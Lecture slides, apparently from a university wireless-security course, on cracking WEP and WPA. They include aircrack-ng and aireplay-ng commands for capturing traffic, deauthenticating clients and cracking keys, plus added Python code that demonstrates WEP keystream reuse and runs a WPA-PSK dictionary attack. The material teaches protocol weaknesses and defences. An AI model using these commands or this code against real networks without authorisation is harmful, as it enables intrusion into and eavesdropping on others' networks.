Page 1: WLAN Security: Cracking WEP/WPA

รศ. ดร. อนันต์ ผลเพิ่ม (Assoc. Prof. Anan Phonphoem, Ph.D.)

[email protected]
http://www.cpe.ku.ac.th/~anan

Computer Engineering Department, Kasetsart University, Bangkok, Thailand

Wireless LANs 2011

Page 2: WEP Block Diagram

[Figure: WEP encryption block (sender site) and decryption block (receiver site)]

Encryption block, sender site:
• The Integrity Algorithm (CRC-32) over the Plain Text gives the Integrity Check Value (ICV).
• The Initialization Vector (IV, 24 bits) concatenated with the Secret Key (40-bit or 104-bit; marketed as "64-bit" and "128-bit" WEP, counting the IV) seeds the RC4 Pseudo-Random Number Generator, which outputs the Key Sequence.
• Plain Text || ICV is bitwise XORed with the Key Sequence to give the Cipher Text. The IV is sent in the clear in front of the Cipher Text (the WEP Frame).

Decryption block, receiver site:
• The received IV concatenated with the same Secret Key seeds RC4 and reproduces the Key Sequence.
• Cipher Text XOR Key Sequence recovers Plain Text || ICV.
• The Integrity Algorithm is recomputed over the recovered Plain Text and compared with the received ICV.

Page 3: WEP – Encoding

[Figure: encryption block only. Integrity Algorithm (CRC-32) → ICV; IV || Secret Key (40-bit or 104-bit) → RC4 Pseudo-Random Number Generator → Key Sequence; (Plain Text || ICV) XOR Key Sequence → Cipher Text, transmitted with the IV in front]

Page 4: WEP Frame

Frame Header | IV Header  | Frame Body | ICV       | Trailer (FCS)
clear text   | clear text | encrypted  | encrypted | clear text
             | 4 bytes    |            | 4 bytes   |

The IV Header carries the 3-byte IV, 6 pad bits and the 2-bit Key ID. Only the Frame Body and the ICV are encrypted; the header, IV and FCS travel in clear text.

Page 5: WEP – Decryption

[Figure: decryption block only. Received IV || Secret Key (40-bit or 104-bit) → RC4 Pseudo-Random Number Generator → Key Sequence; Cipher Text XOR Key Sequence → Plain Text || ICV; Integrity Algorithm recomputed over Plain Text and compared with the received ICV]
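
The encryption and decryption blocks of slides 2 to 5, written out as an added Python example (this is not code from the slides): RC4 seeded with IV || secret key, the CRC-32 ICV, the 4-byte IV header of slide 4, and the keystream-reuse weakness that WEP cracking builds on. The key, IV and plaintexts below are constructed values; the 40-bit/104-bit key sizes and the byte layout follow the WEP standard.

```python
import struct
import zlib

# Added example, not part of the slides: WEP sender/receiver blocks and the
# key-sequence reuse that results from a public 24-bit IV. Key, IV and
# plaintexts are constructed for the demo.

def rc4_keystream(key: bytes, n: int) -> bytes:
    """RC4 KSA + PRGA: return the first n bytes of the key sequence for `key`."""
    s = list(range(256))
    j = 0
    for i in range(256):                        # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_icv(plaintext: bytes) -> bytes:
    """Integrity Check Value: CRC-32 of the plaintext, little-endian (slide 2)."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)

def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Sender site (slide 3): IV header + RC4(IV || key) XOR (plaintext || ICV).

    secret_key is 5 bytes (40-bit, "64-bit WEP") or 13 bytes (104-bit, "128-bit WEP").
    The 3-byte IV is prepended to the key to seed RC4 and is sent in the clear.
    """
    if len(iv) != 3 or len(secret_key) not in (5, 13):
        raise ValueError("IV must be 3 bytes; key must be 5 or 13 bytes")
    key_sequence = rc4_keystream(iv + secret_key, len(plaintext) + 4)
    iv_header = iv + bytes([(key_id & 0x3) << 6])   # 3-byte IV, 6 pad bits, 2-bit Key ID
    return iv_header + xor_bytes(plaintext + wep_icv(plaintext), key_sequence)

def wep_decrypt(secret_key: bytes, frame_body: bytes):
    """Receiver site (slide 5): plaintext if the recomputed ICV matches, else None."""
    iv, ciphertext = frame_body[:3], frame_body[4:]
    key_sequence = rc4_keystream(iv + secret_key, len(ciphertext))
    recovered = xor_bytes(ciphertext, key_sequence)
    plaintext, icv = recovered[:-4], recovered[-4:]
    return plaintext if wep_icv(plaintext) == icv else None

# The key sequence depends only on (IV, secret key). The IV is public and only
# 24 bits wide, so it must repeat within 2^24 frames. Knowing the plaintext of
# one frame under a given IV yields that IV's key sequence, which decrypts every
# other frame sent under the same IV without the key. aircrack-ng's statistical
# attacks on RC4 (FMS/PTW, fed by the IVs airodump collects) recover the key itself.

def recover_key_sequence(frame_body: bytes, known_plaintext: bytes) -> bytes:
    """Ciphertext XOR (known plaintext || its ICV) = key sequence for that IV."""
    return xor_bytes(frame_body[4:], known_plaintext + wep_icv(known_plaintext))

def decrypt_with_key_sequence(frame_body: bytes, key_sequence: bytes) -> bytes:
    """Decrypt a frame that reused the IV using only the recovered key sequence."""
    ciphertext = frame_body[4:]
    if len(ciphertext) > len(key_sequence):
        raise ValueError("known key sequence too short for this frame")
    return xor_bytes(ciphertext, key_sequence)[:-4]      # drop the ICV

def demo_iv_reuse() -> bytes:
    """Two constructed frames under one IV: the first's known plaintext decrypts the second."""
    key = bytes.fromhex("0102030405")                     # constructed 40-bit key
    iv = bytes.fromhex("3b4c5d")                          # constructed IV, reused below
    first = wep_encrypt(key, iv, b"GET / HTTP/1.0")       # plaintext an attacker can guess
    second = wep_encrypt(key, iv, b"secret-data-12")
    key_sequence = recover_key_sequence(first, b"GET / HTTP/1.0")
    return decrypt_with_key_sequence(second, key_sequence)

if __name__ == "__main__":
    print(demo_iv_reuse())
```

Running the file prints the second frame's plaintext, recovered without the key. The ICV check in `wep_decrypt` is the receiver's only integrity mechanism, and because CRC-32 is linear it does not stop an attacker who flips ciphertext bits from fixing up the ICV to match.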

Page 6: Cracking WEP

Page 7: Cracking Steps

1) Reconnaissance (collect target info.) [kismet]
2) Run promiscuous (monitor) mode [iwconfig, airmon]
3) Collect data [airodump]
4) Crack key [aircrack]

Page 8: Default SSIDs

Page 9: 1) Reconnaissance (Collect target info.)

Page 10: Kismet (Reconnaissance)

Page 11: Kismet (AP Info.)

Page 12: Kismet (Client Info.)

Page 13: 2) Run promiscuous (monitor) mode

Page 14: Regular Behavior

[Figure: four stations, 1 to 4. Station 1 transmits to all (broadcast).]

Page 15: Intention to Eavesdrop

[Figure: four stations, 1 to 4. Station 1 transmits to station 4; a station in promiscuous mode captures the frame although it is not the addressee.]

Page 16: iwconfig

Page 17: iwlist

Page 18: Promiscuous Mode Setup

• By using iwconfig

Page 19: Promiscuous Mode Setup

• By using airmon-ng

Page 20: Promiscuous Mode Setup

Page 21: 3) Collect data

Page 22: airodump, from Kismet

Page 23: Airodump problem

    root@APMoose:~/toulouse# airodump-ng mon0
    ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

/dev/rfkill is the interface to Linux's rfkill kernel subsystem, which controls radio transmitters (enabled/disabled). A soft block is set by software and software can clear it; a hard block comes from a physical switch and software cannot clear it.

    anan@APMoose:~$ rfkill list
    0: phy0: Wireless LAN
        Soft blocked: no
        Hard blocked: no
    1: acer-wireless: Wireless LAN
        Soft blocked: no
        Hard blocked: no
    2: acer-bluetooth: Bluetooth
        Soft blocked: no
        Hard blocked: no
    4: hci0: Bluetooth
        Soft blocked: no
        Hard blocked: no

Solve by:

    root@APMoose:~/toulouse# rfkill unblock all

Page 24: airodump

Page 25: airodump data files

Page 26: 4) Crack Key

Page 27: aircrack

• For non-encryption

Page 28: aircrack

Page 29: WEP Cracking Demo

Page 30: Cracking WPA

Page 31: Cracking Steps

1) Start the wireless interface in monitor mode on the specific AP channel
2) Start airodump-ng on the AP channel with a filter for the BSSID to collect the authentication handshake
3) Use aireplay-ng to deauthenticate the wireless client
4) Run aircrack-ng to crack the pre-shared key using the authentication handshake

Source: http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Page 32: 1) Start Monitoring Mode

Page 33: Check interface

Page 34: iwconfig

Page 35: Start monitoring mode

Page 36: 2) Start airodump-ng (collect authentication handshake)

Page 37: Start airodump-ng

    Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0

Parameter                  | Description
-c 6                       | Wireless channel of the AP
--bssid 00:1E:F7:xx:xx:xx  | AP's MAC (only frames of this BSSID are written)
-w psk                     | File name prefix for the capture (contains the IVs and the handshake frames)
mon0                       | Interface name (monitor mode)

Page 38: Start airodump-ng with fewer parameters

    Moose# airodump-ng -w psk mon0

Page 39: 3) Deauthenticate client

Page 40: aireplay

    Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0

Parameter             | Description
-0                    | Deauthentication attack
1                     | Number of deauthentication packets to send
-a 00:12:01:xx:xx:xx  | AP's MAC
-c 00:23:11:xx:xx:xx  | MAC of the client to deauthenticate
mon0                  | Interface name

The client reconnects after the deauthentication and performs a new 4-way handshake, which airodump-ng records.

Page 41: 4) Crack

Page 42: Need a dictionary

    Moose# aircrack-ng -b 00:12:01:xx:xx:xx psk*.cap

Without a word list (-w) aircrack-ng cannot attack a WPA handshake and asks for a dictionary.

Page 43: With dictionary

    Moose# aircrack-ng -w password.lst psk*.cap
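
What step 4 does for every word in password.lst, as an added Python example (not the slides' code and not aircrack-ng's): PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds); PTK via the 802.11i PRF-512 over the two MAC addresses and two nonces taken from the handshake; then the EAPOL-Key MIC is recomputed with the KCK and compared with the captured MIC. The SSID, MAC addresses, nonces and word list below are constructed, and the message-2 frame is built in the file to stand in for the psk*.cap capture.

```python
import hashlib
import hmac
import struct

# Added example, not from the slides or aircrack-ng: the WPA/WPA2-PSK check that
# a dictionary attack runs per candidate passphrase. All handshake values below
# are constructed for the demo.

def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PSK -> PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-X on HMAC-SHA1: HMAC(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]

def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and of the nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)

MIC_OFFSET = 81   # EAPOL header (4) + descriptor fields preceding Key MIC (77)

def eapol_mic(kck: bytes, eapol: bytes, descriptor_version: int) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.
    Descriptor version 1 (TKIP): HMAC-MD5. Version 2 (CCMP): HMAC-SHA1 truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if descriptor_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_eapol_msg2(snonce: bytes, descriptor_version: int, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal handshake message 2 (STA -> AP): RSN descriptor, Pairwise and MIC bits set, no key data."""
    key_info = 0x0108 | descriptor_version                # bit 3 Pairwise, bit 8 Key MIC
    body = (struct.pack(">BHHQ", 2, key_info, 16, 1)      # descriptor type 2 (RSN), key length, replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # Key Nonce, Key IV, Key RSC, Key ID
            + mic + struct.pack(">H", 0))                 # Key MIC, Key Data Length = 0
    return struct.pack(">BBH", 1, 3, len(body)) + body    # EAPOL version 1, type 3 (Key)

def crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, descriptor_version=2):
    """Dictionary attack: the word whose recomputed MIC equals the captured MIC, else None."""
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        kck = derive_ptk(pmk_from_passphrase(word, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2, descriptor_version), captured_mic):
            return word
    return None

# Constructed handshake parameters standing in for the psk*.cap capture (not real).
SSID = b"ku-lab"
AP_MAC = bytes.fromhex("001201aabbcc")
STA_MAC = bytes.fromhex("002311ddeeff")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))

def make_handshake(passphrase: str) -> bytes:
    """Message 2 as a client that knows `passphrase` would send it (valid MIC)."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_msg2(SNONCE, 2)
    return build_eapol_msg2(SNONCE, 2, eapol_mic(kck, unsigned, 2))

if __name__ == "__main__":
    capture = make_handshake("correct horse")
    print(crack_psk(["password", "12345678", "correct horse"],
                    SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, capture))
```

Design note: the 4096 PBKDF2 iterations per candidate are what makes this a dictionary attack rather than a brute force, so the defence is a long passphrase that is not in any word list. The SSID is the PBKDF2 salt, which is why changing a default SSID (slide 8) also defeats precomputed PMK tables.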

Page 44: Handshake found

Source: http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Page 45: Successfully Cracked

Source: http://www.aircrack-ng.org/doku.php?id=cracking_wpa